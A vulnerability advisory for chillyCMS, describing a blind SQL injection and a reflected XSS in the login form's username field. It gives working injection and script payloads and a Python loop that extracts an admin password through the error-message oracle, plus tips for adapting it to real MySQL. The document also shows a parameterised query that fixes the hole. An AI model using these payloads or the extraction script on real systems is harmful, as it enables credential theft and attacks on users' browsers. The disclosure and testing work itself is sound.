chillyCMS Multiple Vulnerabilities
chillyCMS is a Content Management System. Its main features are: easily edit your content in a WYSIWYG editor, manage your users in different groups with different rights, upload single files or whole zip archives, insert your pictures into the content by drag and drop, one-click backup with integrated installer, extend your CMS with various modules, and see which articles are most popular in the statistics.

Summary: The username field of the login form is injectable. The submitted value is placed inside a single-quoted string that is itself wrapped in one pair of parentheses in the SQL query, so a value beginning with ') closes both and the rest of the value is parsed as SQL. For details check the PoC section below. Separately, whenever a login fails the submitted username is printed on the main page without sanitizing, so it can be used to execute arbitrary JavaScript in the browser of whoever views the page (reflected cross-site scripting).

Exploiting The (MySQL) SQL Injection Vulnerability: Go to the login page at 'victim.com/chillyCMS/core/show.site.php' and submit the following vector as the username to inject an arbitrary condition (the closing ') of the application's own query completes the trailing 1=(' fragment):

') or $THE_QUERY or 1=('

For example, the following vector tests a single character of the pw field (the password) of the admin user:

admin')and substr(pw,I,1)=('C

Replace I with the 1-based index of the character, iterating it in a loop, and C with each candidate character in turn. If the injected condition is true, the username is accepted and the "wrong password" error is shown; if it is false, the username is rejected and the "wrong username" error is shown. The two distinct error messages act as a boolean oracle, so the password can be recovered one character at a time (blind SQL injection).

Exploiting The XSS Vulnerability: Go to the same login page at 'victim.com/chillyCMS/core/show.site.php' and submit the following vector as the username to inject arbitrary JavaScript:

'><script>alert(1)</script>

This will cause an alert box to be shown whenever the login fails, because the failed username is reflected into the page unescaped.
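The blind extraction loop described above, as an added example that is not part of the original advisory or of the chillyCMS code. It simulates the login oracle against an in-memory SQLite table instead of the real MySQL backend, and the query shape (SELECT pw FROM users WHERE (name='...')), the table name users and the column name are assumptions; only the pw column and the injection vector come from the advisory. The sample users are constructed. The vulnerable string-concatenated lookup is shown beside a parameterised one so the difference can be tested with the same payload.

```python
import sqlite3
import string

# Constructed sample data standing in for the CMS user table.
SAMPLE_USERS = [("admin", "s3cr3t!"), ("editor", "hunter2")]


def make_db():
    """In-memory SQLite stand-in for the CMS database (assumption: MySQL in reality)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def build_vulnerable_query(username):
    """Assumed shape of the injectable lookup: the username is concatenated
    into a single-quoted string wrapped in one pair of parentheses, exactly the
    'one-parenthesis single-quoted' situation the advisory describes."""
    return "SELECT pw FROM users WHERE (name='%s')" % username


def username_accepted(con, username):
    """Simulated login oracle. True means the lookup returned a row (the CMS
    would then show 'wrong password'); False means no row ('wrong username')."""
    return con.execute(build_vulnerable_query(username)).fetchone() is not None


# Candidate characters; the single quote and backslash are left out because
# they would break the quoting of the injected string instead of testing it.
ALPHABET = [c for c in string.ascii_letters + string.digits + string.punctuation
            if c not in "'\\"]


def extract_field(con, user, max_len=64, alphabet=ALPHABET):
    """Recover the pw field of `user` one character at a time using the
    advisory's vector: user')and substr(pw,I,1)=('C.
    Stops when no candidate matches, i.e. substr() returned '' past the end."""
    recovered = ""
    for index in range(1, max_len + 1):
        for candidate in alphabet:
            payload = "%s')and substr(pw,%d,1)=('%s" % (user, index, candidate)
            if username_accepted(con, payload):
                recovered += candidate
                break
        else:
            break  # no candidate matched: end of string (or a char outside ALPHABET)
    return recovered


def safe_lookup(con, username):
    """The hardened form: the username travels as a bound parameter, so the
    same payload is compared literally against the name column and matches nothing."""
    return con.execute("SELECT pw FROM users WHERE name = ?", (username,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("admin password:", extract_field(db, "admin"))
    print("payload against safe lookup:",
          safe_lookup(db, "admin')and substr(pw,1,1)=('s"))
```

Two caveats when running this against a real MySQL backend rather than the SQLite stand-in: the default MySQL collations compare strings case-insensitively, so substr(pw,I,1)='c' and ='C' would both be true and the loop would need a BINARY comparison to recover the exact case; and every position costs one request per candidate character, so a narrower alphabet (or a binary search on ASCII codes using ord()) cuts the request count considerably.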